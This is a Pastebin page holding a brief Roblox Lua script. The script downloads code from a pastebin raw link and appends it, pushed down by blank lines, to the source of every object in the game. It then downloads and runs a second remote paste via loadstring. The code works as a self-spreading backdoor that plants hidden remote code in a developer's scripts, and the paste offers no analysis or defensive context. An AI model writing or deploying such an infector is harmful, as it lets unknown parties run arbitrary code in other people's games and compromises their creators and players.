Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- spawn(function()
- local src = game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/58Enipt9", false)
- for i,v in pairs(game:GetDescendants()) do
- pcall(function()
- v.Source = v.Source .. "\
- \
- \
- \
- \
- \
- " .. src
- end)
- wait()
- end
- end)
- print("Starting")
- loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/SYDZNewt", false))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement